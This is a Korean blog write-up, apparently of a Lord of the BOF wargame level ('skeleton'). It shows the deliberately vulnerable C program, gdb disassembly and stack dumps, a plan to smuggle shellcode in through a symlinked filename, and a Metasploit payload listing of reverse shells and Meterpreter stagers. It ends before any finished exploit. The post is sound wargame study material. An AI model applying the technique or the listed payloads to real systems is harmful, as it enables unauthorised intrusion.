BOF 원정대

BOF 원정대 – Level 10 (skeleton)

Leave a comment on BOF 원정대 – Level 10 (skeleton)

문제 소스는 아래와 같다.

/*
 The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/

#include <stdio.h>
#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])
{
 char buffer[40];
 int i, saved_argc;

 if(argc < 2){
 printf(argv error\n);
 exit(0);
 }

 // egghunter
 for(i=0; environ[i]; i++)
 memset(environ[i], 0, strlen(environ[i]));

 if(argv[1][47] != '\xbf')
 {
 printf(stack is still your friend.\n);
 exit(0);
 }

 // check the length of argument
 if(strlen(argv[1]) > 48){
 printf(argument is too long!\n);
 exit(0);
 }

 // argc saver
 saved_argc = argc;

 strcpy(buffer, argv[1]);
 printf(%s\n, buffer);

 // buffer hunter
 memset(buffer, 0, 40);

 // ultra argv hunter!
 for(i=0; i<saved_argc; i++)
 memset(argv[i], 0, strlen(argv[i]));
}

코드를 보면 환경변수, argv, 버퍼 이렇게 모두 사용할 수 없음을 알 수 있다. 그리고 argv[1][47] 값을 0xbf로 제한하고 있기 때문에 RTL 등의 공격 또한 불가능 하다. 그래서 우선 디버깅을 해보기로 했다.

[vampire@localhost vampire]$ gdb skeleton_tmp
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB. Type show warranty for details.
This GDB was configured as i386-redhat-linux...
(gdb) disassemble main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %esp,%ebp
0x8048503 <main+3>: sub $0x30,%esp
0x8048506 <main+6>: cmpl $0x1,0x8(%ebp)
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push $0x80486d0
0x8048511 <main+17>: call 0x8048410 <printf>
0x8048516 <main+22>: add $0x4,%esp
0x8048519 <main+25>: push $0x0
0x804851b <main+27>: call 0x8048420 <exit>
0x8048520 <main+32>: add $0x4,%esp
0x8048523 <main+35>: nop 
0x8048524 <main+36>: movl $0x0,0xffffffd4(%ebp)
0x804852b <main+43>: nop 
0x804852c <main+44>: lea 0x0(%esi,1),%esi
0x8048530 <main+48>: mov 0xffffffd4(%ebp),%eax
0x8048533 <main+51>: lea 0x0(,%eax,4),%edx
0x804853a <main+58>: mov 0x8049804,%eax
0x804853f <main+63>: cmpl $0x0,(%eax,%edx,1)
0x8048543 <main+67>: jne 0x8048547 <main+71>
0x8048545 <main+69>: jmp 0x8048587 <main+135>
0x8048547 <main+71>: mov 0xffffffd4(%ebp),%eax
0x804854a <main+74>: lea 0x0(,%eax,4),%edx
0x8048551 <main+81>: mov 0x8049804,%eax
0x8048556 <main+86>: mov (%eax,%edx,1),%edx
0x8048559 <main+89>: push %edx
0x804855a <main+90>: call 0x80483f0 <strlen>
0x804855f <main+95>: add $0x4,%esp
0x8048562 <main+98>: mov %eax,%eax
0x8048564 <main+100>: push %eax
0x8048565 <main+101>: push $0x0
0x8048567 <main+103>: mov 0xffffffd4(%ebp),%eax
0x804856a <main+106>: lea 0x0(,%eax,4),%edx
0x8048571 <main+113>: mov 0x8049804,%eax
0x8048576 <main+118>: mov (%eax,%edx,1),%edx
0x8048579 <main+121>: push %edx
0x804857a <main+122>: call 0x8048430 <memset>
0x804857f <main+127>: add $0xc,%esp
0x8048582 <main+130>: incl 0xffffffd4(%ebp)
---Type <return> to continue, or q <return> to quit---
0x8048585 <main+133>: jmp 0x8048530 <main+48>
0x8048587 <main+135>: mov 0xc(%ebp),%eax
0x804858a <main+138>: add $0x4,%eax
0x804858d <main+141>: mov (%eax),%edx
0x804858f <main+143>: add $0x2f,%edx
0x8048592 <main+146>: cmpb $0xbf,(%edx)
0x8048595 <main+149>: je 0x80485b0 <main+176>
0x8048597 <main+151>: push $0x80486dc
0x804859c <main+156>: call 0x8048410 <printf>
0x80485a1 <main+161>: add $0x4,%esp
0x80485a4 <main+164>: push $0x0
0x80485a6 <main+166>: call 0x8048420 <exit>
0x80485ab <main+171>: add $0x4,%esp
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov 0xc(%ebp),%eax
0x80485b3 <main+179>: add $0x4,%eax
0x80485b6 <main+182>: mov (%eax),%edx
0x80485b8 <main+184>: push %edx
0x80485b9 <main+185>: call 0x80483f0 <strlen>
0x80485be <main+190>: add $0x4,%esp
0x80485c1 <main+193>: mov %eax,%eax
0x80485c3 <main+195>: cmp $0x30,%eax
0x80485c6 <main+198>: jbe 0x80485e0 <main+224>
0x80485c8 <main+200>: push $0x80486f9
0x80485cd <main+205>: call 0x8048410 <printf>
0x80485d2 <main+210>: add $0x4,%esp
0x80485d5 <main+213>: push $0x0
0x80485d7 <main+215>: call 0x8048420 <exit>
0x80485dc <main+220>: add $0x4,%esp
0x80485df <main+223>: nop 
0x80485e0 <main+224>: mov 0x8(%ebp),%eax
0x80485e3 <main+227>: mov %eax,0xffffffd0(%ebp)
0x80485e6 <main+230>: mov 0xc(%ebp),%eax
0x80485e9 <main+233>: add $0x4,%eax
0x80485ec <main+236>: mov (%eax),%edx
0x80485ee <main+238>: push %edx
0x80485ef <main+239>: lea 0xffffffd8(%ebp),%eax
0x80485f2 <main+242>: push %eax
0x80485f3 <main+243>: call 0x8048440 <strcpy>
0x80485f8 <main+248>: add $0x8,%esp
---Type <return> to continue, or q <return> to quit---
0x80485fb <main+251>: lea 0xffffffd8(%ebp),%eax
0x80485fe <main+254>: push %eax
0x80485ff <main+255>: push $0x8048710
0x8048604 <main+260>: call 0x8048410 <printf>
0x8048609 <main+265>: add $0x8,%esp
0x804860c <main+268>: push $0x28
0x804860e <main+270>: push $0x0
0x8048610 <main+272>: lea 0xffffffd8(%ebp),%eax
0x8048613 <main+275>: push %eax
0x8048614 <main+276>: call 0x8048430 <memset>
0x8048619 <main+281>: add $0xc,%esp
0x804861c <main+284>: movl $0x0,0xffffffd4(%ebp)
0x8048623 <main+291>: mov 0xffffffd4(%ebp),%eax
0x8048626 <main+294>: cmp 0xffffffd0(%ebp),%eax
0x8048629 <main+297>: jl 0x8048630 <main+304>
0x804862b <main+299>: jmp 0x8048670 <main+368>
0x804862d <main+301>: lea 0x0(%esi),%esi
0x8048630 <main+304>: mov 0xffffffd4(%ebp),%eax
0x8048633 <main+307>: lea 0x0(,%eax,4),%edx
0x804863a <main+314>: mov 0xc(%ebp),%eax
0x804863d <main+317>: mov (%eax,%edx,1),%edx
0x8048640 <main+320>: push %edx
0x8048641 <main+321>: call 0x80483f0 <strlen>
0x8048646 <main+326>: add $0x4,%esp
0x8048649 <main+329>: mov %eax,%eax
0x804864b <main+331>: push %eax
0x804864c <main+332>: push $0x0
0x804864e <main+334>: mov 0xffffffd4(%ebp),%eax
0x8048651 <main+337>: lea 0x0(,%eax,4),%edx
0x8048658 <main+344>: mov 0xc(%ebp),%eax
0x804865b <main+347>: mov (%eax,%edx,1),%edx
0x804865e <main+350>: push %edx
0x804865f <main+351>: call 0x8048430 <memset>
0x8048664 <main+356>: add $0xc,%esp
0x8048667 <main+359>: incl 0xffffffd4(%ebp)
0x804866a <main+362>: jmp 0x8048623 <main+291>
0x804866c <main+364>: lea 0x0(%esi,1),%esi
0x8048670 <main+368>: leave 
0x8048671 <main+369>: ret 
0x8048672 <main+370>: nop 
---Type <return> to continue, or q <return> to quit---
0x8048673 <main+371>: nop 
0x8048674 <main+372>: nop 
0x8048675 <main+373>: nop 
0x8048676 <main+374>: nop 
0x8048677 <main+375>: nop 
0x8048678 <main+376>: nop 
0x8048679 <main+377>: nop 
0x804867a <main+378>: nop 
0x804867b <main+379>: nop 
0x804867c <main+380>: nop 
0x804867d <main+381>: nop 
0x804867e <main+382>: nop 
0x804867f <main+383>: nop 
End of assembler dump.
(gdb) b main+369
Junk at end of arguments.
(gdb) b *main+369
Breakpoint 1 at 0x8048671
(gdb) r `python -c print '\xbf'*48`
Starting program: /home/vampire/skeleton_tmp `python -c print '\xbf'*48`

Breakpoint 1, 0x8048671 in main ()
(gdb) x/32wx $esp
0xbffffadc: 0xbfbfbfbf 0x00000000 0xbffffb24 0xbffffb30
0xbffffaec: 0x40013868 0x00000002 0x08048450 0x00000000
0xbffffafc: 0x08048471 0x08048500 0x00000002 0xbffffb24
0xbffffb0c: 0x08048390 0x080486ac 0x4000ae60 0xbffffb1c
0xbffffb1c: 0x40013e90 0x00000002 0xbffffc1d 0xbffffc38
0xbffffb2c: 0x00000000 0xbffffc69 0xbffffc7b 0xbffffc94
0xbffffb3c: 0xbffffcb3 0xbffffcd5 0xbffffce2 0xbffffea5
0xbffffb4c: 0xbffffec4 0xbffffee1 0xbffffef6 0xbfffff15
(gdb)
0xbffffb5c: 0xbfffff20 0xbfffff30 0xbfffff38 0xbfffff49
0xbffffb6c: 0xbfffff53 0xbfffff61 0xbfffff72 0xbfffff80
0xbffffb7c: 0xbfffff8b 0xbfffff9e 0x00000000 0x00000003
0xbffffb8c: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffffb9c: 0x00000006 0x00000006 0x00001000 0x00000007
0xbffffbac: 0x40000000 0x00000008 0x00000000 0x00000009
0xbffffbbc: 0x08048450 0x0000000b 0x000001fd 0x0000000c
0xbffffbcc: 0x000001fd 0x0000000d 0x000001fd 0x0000000e
(gdb)
0xbffffbdc: 0x000001fd 0x00000010 0x0febfbff 0x0000000f
0xbffffbec: 0xbffffc18 0x00000000 0x00000000 0x00000000
0xbffffbfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc0c: 0x00000000 0x00000000 0x00000000 0x36383669
0xbffffc1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc4c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffc5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffccc: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffcdc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd4c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffd5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdcc: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffddc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdfc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe4c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffe5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffebc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffecc: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbffffedc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffefc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff1c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff2c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff3c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff4c: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffff5c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffbc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffffcc: 0x00000000 0x00000000 0x00000000 0x00000000
(gdb)
0xbfffffdc: 0x00000000 0x6f682f00 0x762f656d 0x69706d61
0xbfffffec: 0x732f6572 0x656c656b 0x5f6e6f74 0x00706d74
0xbffffffc: 0x00000000 Cannot access memory at address 0xc0000000
(gdb)
0xc0000004: Cannot access memory at address 0xc0000004
(gdb) x/s 0xbfffffdf
0xbfffffdf: \
(gdb)
0xbfffffe0: \
(gdb)
0xbfffffe1: /home/vampire/skeleton_tmp
(gdb)
0xbffffffc: \
(gdb)

스택의 마지막 쯤에 파일 경로가 나옴을 확인할 수 있었다. 문제 소스상 argv[0] 값을 지우므로 argv[0]는 아닌것으로 보이며 실제 파일을 실행하는 path가 기록되는 것으로 보인다. 따라서 파일명을 쉘코드로 바꾸어 공격이 가능할 것으로 보인다.

파일명을 쉘코드로 만들기 위해 가장 간단한 방법은 공격 대상의 바이너리에 심볼릭링크를 거는 것이다. 몇번의 시도 끝에 파일명에 '\x2f (/)' 가 삽입이 안된다는 사실을 알 수 있었다. 이것을 만족하는 쉘코드가 필요하게 되었다. 그래서 Metasploit에서 쉘코드를 한번 뽑아 보았다.

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #

 =[ metasploit v3.6.0-dev [core:3.6 api:1.0]
+ -- --=[ 638 exploits - 314 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
 =[ svn r11395 updated today (2010.12.22)

msf > show payloads

Payloads
========

 Name Disclosure Date Rank Description
---- --------------- ---- -----------
 aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
 aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
 aix/ppc/shell_interact normal AIX execve shell for inetd
 aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline
 bsd/sparc/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
 bsd/sparc/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
 bsd/x86/exec normal BSD Execute Command
 bsd/x86/metsvc_bind_tcp normal FreeBSD Meterpreter Service, Bind TCP
 bsd/x86/metsvc_reverse_tcp normal FreeBSD Meterpreter Service, Reverse TCP Inline
 bsd/x86/shell/bind_tcp normal BSD Command Shell, Bind TCP Stager
 bsd/x86/shell/find_tag normal BSD Command Shell, Find Tag Stager
 bsd/x86/shell/reverse_tcp normal BSD Command Shell, Reverse TCP Stager
 bsd/x86/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline
 bsd/x86/shell_find_port normal BSD Command Shell, Find Port Inline
 bsd/x86/shell_find_tag normal BSD Command Shell, Find Tag Inline
 bsd/x86/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline
 bsdi/x86/shell/bind_tcp normal BSDi Command Shell, Bind TCP Stager
 bsdi/x86/shell/reverse_tcp normal BSDi Command Shell, Reverse TCP Stager
 bsdi/x86/shell_bind_tcp normal BSDi Command Shell, Bind TCP Inline
 bsdi/x86/shell_find_port normal BSDi Command Shell, Find Port Inline
 bsdi/x86/shell_reverse_tcp normal BSDi Command Shell, Reverse TCP Inline
 cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd)
 cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e)
 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
 cmd/unix/generic normal Unix Command, Generic command execution
 cmd/unix/interact normal Unix Command, Interact with established connection
 cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
 cmd/unix/reverse_bash normal Unix Command Shell, Reverse TCP (/dev/tcp)
 cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e)
 cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
 cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)
 cmd/windows/adduser normal Windows Execute net user /ADD CMD
 cmd/windows/bind_perl normal Windows Command Shell, Bind TCP (via perl)
 cmd/windows/bind_ruby normal Windows Command Shell, Bind TCP (via Ruby)
 cmd/windows/download_exec_vbs normal Windows Executable Download and Execute (via .vbs)
 cmd/windows/reverse_perl normal Windows Command, Double reverse TCP connection (via perl)
 cmd/windows/reverse_ruby normal Windows Command Shell, Reverse TCP (via Ruby)
 generic/debug_trap normal Generic x86 Debug Trap
 generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
 generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
 generic/tight_loop normal Generic x86 Tight Loop
 java/jsp_shell_bind_tcp normal Java JSP Command Shell, Bind TCP Inline
 java/jsp_shell_reverse_tcp normal Java JSP Command Shell, Reverse TCP Inline
 java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP stager
 java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP stager
 java/shell/bind_tcp normal Command Shell, Java Bind TCP stager
 java/shell/reverse_tcp normal Command Shell, Java Reverse TCP stager
 linux/armle/exec normal Linux Execute Command
 linux/armle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/mipsbe/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/mipsle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/ppc/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/ppc/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/ppc/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/ppc64/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/ppc64/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/ppc64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/x86/adduser normal Linux Add User
 linux/x86/chmod normal Linux Chmod
 linux/x86/exec normal Linux Execute Command
 linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6)
 linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager
 linux/x86/meterpreter/find_tag normal Linux Meterpreter, Find Tag Stager
 linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP Stager (IPv6)
 linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager
 linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP
 linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline
 linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6)
 linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager
 linux/x86/shell/find_tag normal Linux Command Shell, Find Tag Stager
 linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6)
 linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager
 linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6)
 linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline
 linux/x86/shell_find_port normal Linux Command Shell, Find Port Inline
 linux/x86/shell_find_tag normal Linux Command Shell, Find Tag Inline
 linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline
 linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP Inline - Metasm demo
 netware/shell/reverse_tcp normal NetWare Command Shell, Reverse TCP Stager
 osx/armle/execute/bind_tcp normal OSX Write and Execute Binary, Bind TCP Stager
 osx/armle/execute/reverse_tcp normal OSX Write and Execute Binary, Reverse TCP Stager
 osx/armle/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
 osx/armle/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
 osx/armle/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/armle/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/armle/vibrate normal OSX iPhone Vibrate
 osx/ppc/shell/bind_tcp normal OSX Command Shell, Bind TCP Stager
 osx/ppc/shell/find_tag normal OSX Command Shell, Find Tag Stager
 osx/ppc/shell/reverse_tcp normal OSX Command Shell, Reverse TCP Stager
 osx/ppc/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/ppc/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/x86/bundleinject/bind_tcp normal Mac OS X Inject Mach-O Bundle, Bind TCP Stager
 osx/x86/bundleinject/reverse_tcp normal Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
 osx/x86/exec normal OSX Execute Command
 osx/x86/isight/bind_tcp normal Mac OS X x86 iSight photo capture, Bind TCP Stager
 osx/x86/isight/reverse_tcp normal Mac OS X x86 iSight photo capture, Reverse TCP Stager
 osx/x86/shell_bind_tcp normal OSX Command Shell, Bind TCP Inline
 osx/x86/shell_find_port normal OSX Command Shell, Find Port Inline
 osx/x86/shell_reverse_tcp normal OSX Command Shell, Reverse TCP Inline
 osx/x86/vforkshell/bind_tcp normal OSX (vfork) Command Shell, Bind TCP Stager
 osx/x86/vforkshell/reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Stager
 osx/x86/vforkshell_bind_tcp normal OSX (vfork) Command Shell, Bind TCP Inline
 osx/x86/vforkshell_reverse_tcp normal OSX (vfork) Command Shell, Reverse TCP Inline
 php/bind_perl normal PHP Command Shell, Bind TCP (via perl)
 php/bind_php normal PHP Command Shell, Bind TCP (via php)
 php/download_exec normal PHP Executable Download and Execute
 php/exec normal PHP Execute Command
 php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager
 php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP stager
 php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline
 php/reverse_perl normal PHP Command, Double reverse TCP connection (via perl)
 php/reverse_php normal PHP Command Shell, Reverse TCP (via php)
 php/shell_findsock normal PHP Command Shell, Find Sock
 solaris/sparc/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
 solaris/sparc/shell_find_port normal Solaris Command Shell, Find Port Inline
 solaris/sparc/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
 solaris/x86/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline
 solaris/x86/shell_find_port normal Solaris Command Shell, Find Port Inline
 solaris/x86/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline
 tty/unix/interact normal Unix TTY, Interact with established connection
 windows/adduser normal Windows Execute net user /ADD
 windows/dllinject/bind_ipv6_tcp normal Reflective Dll Injection, Bind TCP Stager (IPv6)
 windows/dllinject/bind_nonx_tcp normal Reflective Dll Injection, Bind TCP Stager (No NX or Win7)
 windows/dllinject/bind_tcp normal Reflective Dll Injection, Bind TCP Stager
 windows/dllinject/find_tag normal Reflective Dll Injection, Find Tag Ordinal Stager
 windows/dllinject/reverse_http normal Reflective Dll Injection, PassiveX Reverse HTTP Tunneling Stager
 windows/dllinject/reverse_ipv6_tcp normal Reflective Dll Injection, Reverse TCP Stager (IPv6)
 windows/dllinject/reverse_nonx_tcp normal Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
 windows/dllinject/reverse_ord_tcp normal Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/dllinject/reverse_tcp normal Reflective Dll Injection, Reverse TCP Stager
 windows/dllinject/reverse_tcp_allports normal Reflective Dll Injection, Reverse All-Port TCP Stager
 windows/dllinject/reverse_tcp_dns normal Reflective Dll Injection, Reverse TCP Stager (DNS)
 windows/download_exec normal Windows Executable Download and Execute
 windows/exec normal Windows Execute Command
 windows/messagebox normal Windows MessageBox
 windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
 windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
 windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager
 windows/meterpreter/find_tag normal Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
 windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), PassiveX Reverse HTTP Tunneling Stager
 windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
 windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
 windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
 windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager
 windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
 windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
 windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP
 windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline
 windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6)
 windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
 windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager
 windows/patchupdllinject/find_tag normal Windows Inject DLL, Find Tag Ordinal Stager
 windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6)
 windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
 windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
 windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager
 windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager
 windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS)
 windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (IPv6)
 windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
 windows/patchupmeterpreter/find_tag normal Windows Meterpreter (skape/jt injection), Find Tag Ordinal Stager
 windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (IPv6)
 windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
 windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
 windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt injection), Reverse All-Port TCP Stager
 windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager (DNS)
 windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6)
 windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7)
 windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager
 windows/shell/find_tag normal Windows Command Shell, Find Tag Ordinal Stager
 windows/shell/reverse_http normal Windows Command Shell, PassiveX Reverse HTTP Tunneling Stager
 windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6)
 windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7)
